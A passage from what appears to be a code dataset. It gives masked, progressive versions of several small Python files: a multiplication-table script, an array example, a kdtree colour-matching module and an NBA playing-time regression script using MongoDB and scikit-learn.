"step-3": "<mask token>\n\n\nclass FixedData:\n\n def get_data(self, id):\n data = self.get_data_from_mongodb(id)\n if data:\n return data\n else:\n data = self.get_data_from_douban(id)\n self.upsert_data_into_mongo(data)\n",
"step-4": "from client import ClientHelper\nfrom mongodb import MongoDBClient\n\n\nclass FixedData:\n\n def get_data(self, id):\n data = self.get_data_from_mongodb(id)\n if data:\n return data\n else:\n data = self.get_data_from_douban(id)\n self.upsert_data_into_mongo(data)\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# All about users.\n#\n# author: [email protected]\n#\n\nfrom client import ClientHelper\nfrom mongodb import MongoDBClient\n\nclass FixedData:\n\n def get_data( self, id ):\n data = self.get_data_from_mongodb( id )\n if ( data ):\n return data\n else:\n data = self.get_data_from_douban( id )\n self.upsert_data_into_mongo( data )\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
n = int(input('Informe um numero: '))
print('----------------')
print('{} x {:2} = {:2}'.format(n, 1, 1 * n))
print('{} x {:2} = {:2}'.format(n, 2, 2 * n))
print('{} x {:2} = {:2}'.format(n, 3, 3 * n))
print('{} x {:2} = {:2}'.format(n, 4, 4 * n))
print('{} x {:2} = {:2}'.format(n, 5, 5 * n))
print('{} x {:2} = {:2}'.format(n, 6, 6 * n))
print('{} x {:2} = {:2}'.format(n, 7, 7 * n))
print('{} x {:2} = {:2}'.format(n, 8, 8 * n))
print('{} x {:2} = {:2}'.format(n, 9, 9 * n))
print('{} x {:2} = {:2}'.format(n, 10, 10 * n))
print('----------------')
|
normal
|
{
"blob_id": "9e814e3f1162e248c5d778c2df9960b199854a27",
"index": 9306,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('----------------')\nprint('{} x {:2} = {:2}'.format(n, 1, 1 * n))\nprint('{} x {:2} = {:2}'.format(n, 2, 2 * n))\nprint('{} x {:2} = {:2}'.format(n, 3, 3 * n))\nprint('{} x {:2} = {:2}'.format(n, 4, 4 * n))\nprint('{} x {:2} = {:2}'.format(n, 5, 5 * n))\nprint('{} x {:2} = {:2}'.format(n, 6, 6 * n))\nprint('{} x {:2} = {:2}'.format(n, 7, 7 * n))\nprint('{} x {:2} = {:2}'.format(n, 8, 8 * n))\nprint('{} x {:2} = {:2}'.format(n, 9, 9 * n))\nprint('{} x {:2} = {:2}'.format(n, 10, 10 * n))\nprint('----------------')\n",
"step-3": "n = int(input('Informe um numero: '))\nprint('----------------')\nprint('{} x {:2} = {:2}'.format(n, 1, 1 * n))\nprint('{} x {:2} = {:2}'.format(n, 2, 2 * n))\nprint('{} x {:2} = {:2}'.format(n, 3, 3 * n))\nprint('{} x {:2} = {:2}'.format(n, 4, 4 * n))\nprint('{} x {:2} = {:2}'.format(n, 5, 5 * n))\nprint('{} x {:2} = {:2}'.format(n, 6, 6 * n))\nprint('{} x {:2} = {:2}'.format(n, 7, 7 * n))\nprint('{} x {:2} = {:2}'.format(n, 8, 8 * n))\nprint('{} x {:2} = {:2}'.format(n, 9, 9 * n))\nprint('{} x {:2} = {:2}'.format(n, 10, 10 * n))\nprint('----------------')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#Array In Python
from array import array
numbers = array("i",[1,2,3])
numbers[0] = 0
print(list(numbers))
|
normal
|
{
"blob_id": "ae5f87f1c383478ea5f370af1c85d63a472a7788",
"index": 455,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(list(numbers))\n",
"step-3": "<mask token>\nnumbers = array('i', [1, 2, 3])\nnumbers[0] = 0\nprint(list(numbers))\n",
"step-4": "from array import array\nnumbers = array('i', [1, 2, 3])\nnumbers[0] = 0\nprint(list(numbers))\n",
"step-5": "#Array In Python\n\nfrom array import array\n\nnumbers = array(\"i\",[1,2,3])\nnumbers[0] = 0\nprint(list(numbers))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from typing import Sequence, Union, Tuple
import kdtree
from colour import Color
AnsiCodeType = Union[str, int, Tuple[int, int, int]]
class ColorPoint(object):
def __init__(self, source: Color, target: Color,
ansi: AnsiCodeType) -> None:
"""
Map source color to target color, stores target
ansi color ans a single int, a sequence of RGB as ints
or markup string.
"""
self.source = source
self.target = target
self.ansi = ansi
def __len__(self) -> int:
"""
>>> cp = ColorPoint(Color('black'), Color('white'), '')
>>> len(cp) == 3
True
"""
return 3
def __getitem__(self, item) -> float:
"""
>>> cp = ColorPoint(Color('#880073'), Color('white'), '')
>>> cp[0] # hue
0.8590686274509803
>>> cp[1] # saturation
1.0
>>> cp[2] # luminance
0.26666666666666666
"""
return self.source.hsl[item]
def __repr__(self) -> str:
return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)
class ColorMatch(object):
def __init__(self) -> None:
self.tree = kdtree.create(dimensions=3)
def add(self, source: Color, target: Color, ansi: AnsiCodeType) -> None:
point = ColorPoint(source, target, ansi)
self.tree.add(point)
def match(self, color: Color) -> ColorPoint:
"""
>>> cm = ColorMatch()
>>> cm.add(Color('red'), Color('white'), '')
>>> cm.add(Color('blue'), Color('white'), '')
>>> cm.match(Color('yellow'))
ColorPoint(<Color red> => <Color white>)
"""
results = self.tree.search_nn(color.hsl)
if not results:
raise KeyError('No match found for color: {}'.format(color))
return results[0].data
|
normal
|
{
"blob_id": "e239c2089fc6d4ab646c490b6e3de8953cec5634",
"index": 8093,
"step-1": "<mask token>\n\n\nclass ColorPoint(object):\n <mask token>\n <mask token>\n\n def __getitem__(self, item) ->float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) ->str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n\n def __init__(self) ->None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) ->None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) ->ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n",
"step-2": "<mask token>\n\n\nclass ColorPoint(object):\n\n def __init__(self, source: Color, target: Color, ansi: AnsiCodeType\n ) ->None:\n \"\"\"\n Map source color to target color, stores target\n ansi color ans a single int, a sequence of RGB as ints\n or markup string.\n \"\"\"\n self.source = source\n self.target = target\n self.ansi = ansi\n <mask token>\n\n def __getitem__(self, item) ->float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) ->str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n\n def __init__(self) ->None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) ->None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) ->ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n",
"step-3": "<mask token>\n\n\nclass ColorPoint(object):\n\n def __init__(self, source: Color, target: Color, ansi: AnsiCodeType\n ) ->None:\n \"\"\"\n Map source color to target color, stores target\n ansi color ans a single int, a sequence of RGB as ints\n or markup string.\n \"\"\"\n self.source = source\n self.target = target\n self.ansi = ansi\n\n def __len__(self) ->int:\n \"\"\"\n >>> cp = ColorPoint(Color('black'), Color('white'), '')\n >>> len(cp) == 3\n True\n \"\"\"\n return 3\n\n def __getitem__(self, item) ->float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) ->str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n\n def __init__(self) ->None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) ->None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) ->ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n",
"step-4": "<mask token>\nAnsiCodeType = Union[str, int, Tuple[int, int, int]]\n\n\nclass ColorPoint(object):\n\n def __init__(self, source: Color, target: Color, ansi: AnsiCodeType\n ) ->None:\n \"\"\"\n Map source color to target color, stores target\n ansi color ans a single int, a sequence of RGB as ints\n or markup string.\n \"\"\"\n self.source = source\n self.target = target\n self.ansi = ansi\n\n def __len__(self) ->int:\n \"\"\"\n >>> cp = ColorPoint(Color('black'), Color('white'), '')\n >>> len(cp) == 3\n True\n \"\"\"\n return 3\n\n def __getitem__(self, item) ->float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) ->str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n\n def __init__(self) ->None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) ->None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) ->ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n",
"step-5": "from typing import Sequence, Union, Tuple\n\nimport kdtree\n\nfrom colour import Color\n\nAnsiCodeType = Union[str, int, Tuple[int, int, int]]\n\n\nclass ColorPoint(object):\n def __init__(self, source: Color, target: Color,\n ansi: AnsiCodeType) -> None:\n \"\"\"\n Map source color to target color, stores target\n ansi color ans a single int, a sequence of RGB as ints\n or markup string.\n \"\"\"\n self.source = source\n self.target = target\n self.ansi = ansi\n\n def __len__(self) -> int:\n \"\"\"\n >>> cp = ColorPoint(Color('black'), Color('white'), '')\n >>> len(cp) == 3\n True\n \"\"\"\n return 3\n\n def __getitem__(self, item) -> float:\n \"\"\"\n >>> cp = ColorPoint(Color('#880073'), Color('white'), '')\n >>> cp[0] # hue\n 0.8590686274509803\n >>> cp[1] # saturation\n 1.0\n >>> cp[2] # luminance\n 0.26666666666666666\n \"\"\"\n return self.source.hsl[item]\n\n def __repr__(self) -> str:\n return 'ColorPoint({!r} => {!r})'.format(self.source, self.target)\n\n\nclass ColorMatch(object):\n def __init__(self) -> None:\n self.tree = kdtree.create(dimensions=3)\n\n def add(self, source: Color, target: Color, ansi: AnsiCodeType) -> None:\n point = ColorPoint(source, target, ansi)\n self.tree.add(point)\n\n def match(self, color: Color) -> ColorPoint:\n \"\"\"\n >>> cm = ColorMatch()\n >>> cm.add(Color('red'), Color('white'), '')\n >>> cm.add(Color('blue'), Color('white'), '')\n >>> cm.match(Color('yellow'))\n ColorPoint(<Color red> => <Color white>)\n \"\"\"\n results = self.tree.search_nn(color.hsl)\n if not results:\n raise KeyError('No match found for color: {}'.format(color))\n return results[0].data\n\n\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
import sys
import numpy as np
from pymongo import MongoClient
from sklearn import linear_model, preprocessing
assert str(sys.argv[1]) is not None
client = MongoClient(str(sys.argv[1]))
db = client.nba_py
variables = ['0', '1', '2', '3', '4',
'5', '6', '7', '8', '9',
'10', '11', '12', '13', '14',
'15', '16', '17', '18', '19', ]
ITERATIONS = 5
MINUTE_RESTRICTION = 15
ALPHA_VALS = [0, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 1]
best_error = 999
best_k = 0
for k in ALPHA_VALS:
total_train_error = 0
total_train_variance = 0
total_test_error = 0
total_test_variance = 0
dumb_total_train_error = 0
dumb_total_train_variance = 0
dumb_total_test_error = 0
dumb_total_test_variance = 0
baseline_error = 0
total_count = 0
for j in range(ITERATIONS):
for i in range(len(variables)):
allData = []
allDumbData = []
cursor = db.playtime_model.find({"PLAYER_GROUP": i, "AVG_MIN": {"$gt": MINUTE_RESTRICTION}})
count = 0
for document in cursor:
dataRow = []
for variable in variables:
dataRow.append(document[variable])
dataRow.append(document['AVG_MIN'])
dataRow.append((document['WIN_CHANCE'])**2)
dataRow.append(document['MIN'])
allData.append(dataRow)
allDumbData.append([document['AVG_MIN'], document['MIN']])
count = count + 1
print("player group: %d, game count: %d" % (i, count))
if (count > 600):
total_count += count
Xy = np.array(allData)
np.random.shuffle(Xy)
X = Xy[ :, range(0, Xy.shape[1]-1) ]
y = Xy[ :, Xy.shape[1]-1 ]
X_normalized = preprocessing.scale(X)
# Separate into Train and Test datasets
train_test_split = int(round(len(y) * 0.7))
X_normalized_train = X_normalized[:train_test_split]
X_normalized_test = X_normalized[train_test_split:]
y_train = y[:train_test_split]
y_test = y[train_test_split:]
# train model
if k == 0:
regr = linear_model.LinearRegression(fit_intercept=True)
else:
regr = linear_model.Lasso(alpha=k, fit_intercept=True)
regr.fit(X_normalized_train, y_train)
# Coefficients
# print('Intercept: ', regr.intercept_) ------------------------------------
# for i in range(regr.coef_.size): -----------------------------------------
# print (variables[i], regr.coef_[i]) ----------------------------------
# print("================") ------------------------------------------------
# Error Analysis
train_error = np.mean((regr.predict(X_normalized_train) - y_train) ** 2)
train_variance = regr.score(X_normalized_train, y_train)
test_error = np.mean((regr.predict(X_normalized_test) - y_test) ** 2)
test_variance = regr.score(X_normalized_test, y_test)
# print("Residual sum of squares for training set: %.2f" % train_error) ----
# print('Variance score: %.2f' % train_variance) ---------------------------
# print("Residual sum of squares for test set: %.2f" % test_error) -
# print('Variance score: %.2f' % test_variance) --------------------
total_train_error += train_error * count
total_train_variance += train_variance * count
total_test_error += test_error * count
total_test_variance += test_variance * count
#~~~~calculate against baseline~~~~~~~~~~~
# Xy = np.array(allDumbData) -----------------------------------
# np.random.shuffle(Xy) ----------------------------------------
# X = Xy[ :, range(0, Xy.shape[1]-1) ] -------------------------
# y = Xy[ :, Xy.shape[1]-1 ] -----------------------------------
# -----------------------------------------------------------------------------
# X_normalized = (X) -------------------------------------------
# -----------------------------------------------------------------------------
# # Separate into Train and Test datasets ----------------------
# train_test_split = int(round(len(y) * 0.7)) ------------------
# X_normalized_train = X_normalized[:train_test_split] ---------
# X_normalized_test = X_normalized[train_test_split:] ----------
# y_train = y[:train_test_split] -------------------------------
# y_test = y[train_test_split:] --------------------------------
# -----------------------------------------------------------------------------
# regr = linear_model.LinearRegression(fit_intercept=True) -----
# regr.fit(X_normalized_train, y_train) ------------------------
# -----------------------------------------------------------------------------
# # Error Analysis ---------------------------------------------
# train_error = np.mean((regr.predict(X_normalized_train) - y_train) ** 2)
# train_variance = regr.score(X_normalized_train, y_train) -----
# test_error = np.mean((regr.predict(X_normalized_test) - y_test) ** 2)
# test_variance = regr.score(X_normalized_test, y_test) --------
# # print("Residual sum of squares for training set: %.2f" % train_error) ----
# # print('Variance score: %.2f' % train_variance) ---------------------------
# # print("Residual sum of squares for dumb test set: %.2f" % test_error)
# # print('Variance score for dumb test set: %.2f' % test_variance) --
# dumb_total_train_error += train_error * count ----------------
# dumb_total_train_variance += train_variance * count ----------
# dumb_total_test_error += test_error * count ------------------
# dumb_total_test_variance += test_variance * count ------------
total_train_error = total_train_error / total_count
total_train_variance = total_train_variance / total_count
total_test_error = total_test_error / total_count
total_test_variance = total_test_variance / total_count
# dumb_total_train_error = dumb_total_train_error / total_count ------------
# dumb_total_train_variance = dumb_total_train_variance / total_count ------
# dumb_total_test_error = dumb_total_test_error / total_count --------------
# dumb_total_test_variance = dumb_total_test_variance / total_count --------
print("alpha-value: %.2f" % k)
print("total_train_error: %.2f" % total_train_error)
print("total_train_variance: %.2f" % total_train_variance)
print("total_test_error: %.2f" % total_test_error)
print("total_test_variance: %.2f" % total_test_variance)
# print("dumb_total_train_error: %.2f" % dumb_total_train_error) -----------
# print("dumb_total_train_variance: %.2f" % dumb_total_train_variance) -----
# print("dumb_total_test_error: %.2f" % dumb_total_test_error) -------------
# print("dumb_total_test_variance: %.2f" % dumb_total_test_variance) -------
# print("total_count: %d" % (total_count / ITERATIONS)) --------------------
if (total_test_error < best_error):
best_error = total_test_error
best_k = k
# Calculate against baseline ---------------------------------------------------
cursor = db.playtime_model.find({"AVG_MIN": {"$gt": MINUTE_RESTRICTION}})
baseline_error = 0.0
count = 0
for document in cursor:
baseline_error += (document['AVG_MIN'] - document['MIN'])**2
count += 1
baseline_error = baseline_error / count
print("baseline error: %.2f" % baseline_error)
print("best error: %.2f, best alpha: %.2f" % (best_error, best_k))
|
normal
|
{
"blob_id": "36682c4ab90cdd22b644906e22ede71254eb42ff",
"index": 2091,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nassert str(sys.argv[1]) is not None\n<mask token>\nfor k in ALPHA_VALS:\n total_train_error = 0\n total_train_variance = 0\n total_test_error = 0\n total_test_variance = 0\n dumb_total_train_error = 0\n dumb_total_train_variance = 0\n dumb_total_test_error = 0\n dumb_total_test_variance = 0\n baseline_error = 0\n total_count = 0\n for j in range(ITERATIONS):\n for i in range(len(variables)):\n allData = []\n allDumbData = []\n cursor = db.playtime_model.find({'PLAYER_GROUP': i, 'AVG_MIN':\n {'$gt': MINUTE_RESTRICTION}})\n count = 0\n for document in cursor:\n dataRow = []\n for variable in variables:\n dataRow.append(document[variable])\n dataRow.append(document['AVG_MIN'])\n dataRow.append(document['WIN_CHANCE'] ** 2)\n dataRow.append(document['MIN'])\n allData.append(dataRow)\n allDumbData.append([document['AVG_MIN'], document['MIN']])\n count = count + 1\n print('player group: %d, game count: %d' % (i, count))\n if count > 600:\n total_count += count\n Xy = np.array(allData)\n np.random.shuffle(Xy)\n X = Xy[:, range(0, Xy.shape[1] - 1)]\n y = Xy[:, Xy.shape[1] - 1]\n X_normalized = preprocessing.scale(X)\n train_test_split = int(round(len(y) * 0.7))\n X_normalized_train = X_normalized[:train_test_split]\n X_normalized_test = X_normalized[train_test_split:]\n y_train = y[:train_test_split]\n y_test = y[train_test_split:]\n if k == 0:\n regr = linear_model.LinearRegression(fit_intercept=True)\n else:\n regr = linear_model.Lasso(alpha=k, fit_intercept=True)\n regr.fit(X_normalized_train, y_train)\n train_error = np.mean((regr.predict(X_normalized_train) -\n y_train) ** 2)\n train_variance = regr.score(X_normalized_train, y_train)\n test_error = np.mean((regr.predict(X_normalized_test) -\n y_test) ** 2)\n test_variance = regr.score(X_normalized_test, y_test)\n total_train_error += train_error * count\n total_train_variance += train_variance * count\n total_test_error += test_error * count\n total_test_variance += test_variance * count\n 
total_train_error = total_train_error / total_count\n total_train_variance = total_train_variance / total_count\n total_test_error = total_test_error / total_count\n total_test_variance = total_test_variance / total_count\n print('alpha-value: %.2f' % k)\n print('total_train_error: %.2f' % total_train_error)\n print('total_train_variance: %.2f' % total_train_variance)\n print('total_test_error: %.2f' % total_test_error)\n print('total_test_variance: %.2f' % total_test_variance)\n if total_test_error < best_error:\n best_error = total_test_error\n best_k = k\n<mask token>\nfor document in cursor:\n baseline_error += (document['AVG_MIN'] - document['MIN']) ** 2\n count += 1\n<mask token>\nprint('baseline error: %.2f' % baseline_error)\nprint('best error: %.2f, best alpha: %.2f' % (best_error, best_k))\n",
"step-3": "<mask token>\nassert str(sys.argv[1]) is not None\nclient = MongoClient(str(sys.argv[1]))\ndb = client.nba_py\nvariables = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11',\n '12', '13', '14', '15', '16', '17', '18', '19']\nITERATIONS = 5\nMINUTE_RESTRICTION = 15\nALPHA_VALS = [0, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 1]\nbest_error = 999\nbest_k = 0\nfor k in ALPHA_VALS:\n total_train_error = 0\n total_train_variance = 0\n total_test_error = 0\n total_test_variance = 0\n dumb_total_train_error = 0\n dumb_total_train_variance = 0\n dumb_total_test_error = 0\n dumb_total_test_variance = 0\n baseline_error = 0\n total_count = 0\n for j in range(ITERATIONS):\n for i in range(len(variables)):\n allData = []\n allDumbData = []\n cursor = db.playtime_model.find({'PLAYER_GROUP': i, 'AVG_MIN':\n {'$gt': MINUTE_RESTRICTION}})\n count = 0\n for document in cursor:\n dataRow = []\n for variable in variables:\n dataRow.append(document[variable])\n dataRow.append(document['AVG_MIN'])\n dataRow.append(document['WIN_CHANCE'] ** 2)\n dataRow.append(document['MIN'])\n allData.append(dataRow)\n allDumbData.append([document['AVG_MIN'], document['MIN']])\n count = count + 1\n print('player group: %d, game count: %d' % (i, count))\n if count > 600:\n total_count += count\n Xy = np.array(allData)\n np.random.shuffle(Xy)\n X = Xy[:, range(0, Xy.shape[1] - 1)]\n y = Xy[:, Xy.shape[1] - 1]\n X_normalized = preprocessing.scale(X)\n train_test_split = int(round(len(y) * 0.7))\n X_normalized_train = X_normalized[:train_test_split]\n X_normalized_test = X_normalized[train_test_split:]\n y_train = y[:train_test_split]\n y_test = y[train_test_split:]\n if k == 0:\n regr = linear_model.LinearRegression(fit_intercept=True)\n else:\n regr = linear_model.Lasso(alpha=k, fit_intercept=True)\n regr.fit(X_normalized_train, y_train)\n train_error = np.mean((regr.predict(X_normalized_train) -\n y_train) ** 2)\n train_variance = regr.score(X_normalized_train, y_train)\n 
test_error = np.mean((regr.predict(X_normalized_test) -\n y_test) ** 2)\n test_variance = regr.score(X_normalized_test, y_test)\n total_train_error += train_error * count\n total_train_variance += train_variance * count\n total_test_error += test_error * count\n total_test_variance += test_variance * count\n total_train_error = total_train_error / total_count\n total_train_variance = total_train_variance / total_count\n total_test_error = total_test_error / total_count\n total_test_variance = total_test_variance / total_count\n print('alpha-value: %.2f' % k)\n print('total_train_error: %.2f' % total_train_error)\n print('total_train_variance: %.2f' % total_train_variance)\n print('total_test_error: %.2f' % total_test_error)\n print('total_test_variance: %.2f' % total_test_variance)\n if total_test_error < best_error:\n best_error = total_test_error\n best_k = k\ncursor = db.playtime_model.find({'AVG_MIN': {'$gt': MINUTE_RESTRICTION}})\nbaseline_error = 0.0\ncount = 0\nfor document in cursor:\n baseline_error += (document['AVG_MIN'] - document['MIN']) ** 2\n count += 1\nbaseline_error = baseline_error / count\nprint('baseline error: %.2f' % baseline_error)\nprint('best error: %.2f, best alpha: %.2f' % (best_error, best_k))\n",
"step-4": "import sys\nimport numpy as np\nfrom pymongo import MongoClient\nfrom sklearn import linear_model, preprocessing\nassert str(sys.argv[1]) is not None\nclient = MongoClient(str(sys.argv[1]))\ndb = client.nba_py\nvariables = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11',\n '12', '13', '14', '15', '16', '17', '18', '19']\nITERATIONS = 5\nMINUTE_RESTRICTION = 15\nALPHA_VALS = [0, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 1]\nbest_error = 999\nbest_k = 0\nfor k in ALPHA_VALS:\n total_train_error = 0\n total_train_variance = 0\n total_test_error = 0\n total_test_variance = 0\n dumb_total_train_error = 0\n dumb_total_train_variance = 0\n dumb_total_test_error = 0\n dumb_total_test_variance = 0\n baseline_error = 0\n total_count = 0\n for j in range(ITERATIONS):\n for i in range(len(variables)):\n allData = []\n allDumbData = []\n cursor = db.playtime_model.find({'PLAYER_GROUP': i, 'AVG_MIN':\n {'$gt': MINUTE_RESTRICTION}})\n count = 0\n for document in cursor:\n dataRow = []\n for variable in variables:\n dataRow.append(document[variable])\n dataRow.append(document['AVG_MIN'])\n dataRow.append(document['WIN_CHANCE'] ** 2)\n dataRow.append(document['MIN'])\n allData.append(dataRow)\n allDumbData.append([document['AVG_MIN'], document['MIN']])\n count = count + 1\n print('player group: %d, game count: %d' % (i, count))\n if count > 600:\n total_count += count\n Xy = np.array(allData)\n np.random.shuffle(Xy)\n X = Xy[:, range(0, Xy.shape[1] - 1)]\n y = Xy[:, Xy.shape[1] - 1]\n X_normalized = preprocessing.scale(X)\n train_test_split = int(round(len(y) * 0.7))\n X_normalized_train = X_normalized[:train_test_split]\n X_normalized_test = X_normalized[train_test_split:]\n y_train = y[:train_test_split]\n y_test = y[train_test_split:]\n if k == 0:\n regr = linear_model.LinearRegression(fit_intercept=True)\n else:\n regr = linear_model.Lasso(alpha=k, fit_intercept=True)\n regr.fit(X_normalized_train, y_train)\n train_error = 
np.mean((regr.predict(X_normalized_train) -\n y_train) ** 2)\n train_variance = regr.score(X_normalized_train, y_train)\n test_error = np.mean((regr.predict(X_normalized_test) -\n y_test) ** 2)\n test_variance = regr.score(X_normalized_test, y_test)\n total_train_error += train_error * count\n total_train_variance += train_variance * count\n total_test_error += test_error * count\n total_test_variance += test_variance * count\n total_train_error = total_train_error / total_count\n total_train_variance = total_train_variance / total_count\n total_test_error = total_test_error / total_count\n total_test_variance = total_test_variance / total_count\n print('alpha-value: %.2f' % k)\n print('total_train_error: %.2f' % total_train_error)\n print('total_train_variance: %.2f' % total_train_variance)\n print('total_test_error: %.2f' % total_test_error)\n print('total_test_variance: %.2f' % total_test_variance)\n if total_test_error < best_error:\n best_error = total_test_error\n best_k = k\ncursor = db.playtime_model.find({'AVG_MIN': {'$gt': MINUTE_RESTRICTION}})\nbaseline_error = 0.0\ncount = 0\nfor document in cursor:\n baseline_error += (document['AVG_MIN'] - document['MIN']) ** 2\n count += 1\nbaseline_error = baseline_error / count\nprint('baseline error: %.2f' % baseline_error)\nprint('best error: %.2f, best alpha: %.2f' % (best_error, best_k))\n",
"step-5": "import sys\nimport numpy as np\nfrom pymongo import MongoClient\nfrom sklearn import linear_model, preprocessing\n\nassert str(sys.argv[1]) is not None\nclient = MongoClient(str(sys.argv[1]))\ndb = client.nba_py\n\nvariables = ['0', '1', '2', '3', '4', \n '5', '6', '7', '8', '9', \n '10', '11', '12', '13', '14', \n '15', '16', '17', '18', '19', ]\n\nITERATIONS = 5\nMINUTE_RESTRICTION = 15\nALPHA_VALS = [0, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 1]\n\nbest_error = 999\nbest_k = 0\n\nfor k in ALPHA_VALS: \n total_train_error = 0\n total_train_variance = 0\n total_test_error = 0\n total_test_variance = 0\n dumb_total_train_error = 0\n dumb_total_train_variance = 0\n dumb_total_test_error = 0\n dumb_total_test_variance = 0\n baseline_error = 0\n total_count = 0\n for j in range(ITERATIONS):\n for i in range(len(variables)):\n \n allData = []\n allDumbData = []\n \n cursor = db.playtime_model.find({\"PLAYER_GROUP\": i, \"AVG_MIN\": {\"$gt\": MINUTE_RESTRICTION}})\n \n count = 0\n for document in cursor:\n dataRow = []\n for variable in variables:\n dataRow.append(document[variable])\n dataRow.append(document['AVG_MIN'])\n dataRow.append((document['WIN_CHANCE'])**2)\n dataRow.append(document['MIN'])\n allData.append(dataRow)\n allDumbData.append([document['AVG_MIN'], document['MIN']])\n count = count + 1\n \n print(\"player group: %d, game count: %d\" % (i, count))\n if (count > 600):\n total_count += count\n \n Xy = np.array(allData)\n np.random.shuffle(Xy)\n X = Xy[ :, range(0, Xy.shape[1]-1) ]\n y = Xy[ :, Xy.shape[1]-1 ]\n \n X_normalized = preprocessing.scale(X)\n \n # Separate into Train and Test datasets\n train_test_split = int(round(len(y) * 0.7))\n X_normalized_train = X_normalized[:train_test_split]\n X_normalized_test = X_normalized[train_test_split:]\n y_train = y[:train_test_split]\n y_test = y[train_test_split:]\n \n # train model\n if k == 0: \n regr = linear_model.LinearRegression(fit_intercept=True)\n else: \n regr = 
linear_model.Lasso(alpha=k, fit_intercept=True)\n regr.fit(X_normalized_train, y_train)\n \n # Coefficients\n # print('Intercept: ', regr.intercept_) ------------------------------------\n # for i in range(regr.coef_.size): -----------------------------------------\n # print (variables[i], regr.coef_[i]) ----------------------------------\n # print(\"================\") ------------------------------------------------\n # Error Analysis\n train_error = np.mean((regr.predict(X_normalized_train) - y_train) ** 2)\n train_variance = regr.score(X_normalized_train, y_train)\n test_error = np.mean((regr.predict(X_normalized_test) - y_test) ** 2)\n test_variance = regr.score(X_normalized_test, y_test)\n # print(\"Residual sum of squares for training set: %.2f\" % train_error) ----\n # print('Variance score: %.2f' % train_variance) ---------------------------\n # print(\"Residual sum of squares for test set: %.2f\" % test_error) -\n # print('Variance score: %.2f' % test_variance) --------------------\n total_train_error += train_error * count\n total_train_variance += train_variance * count\n total_test_error += test_error 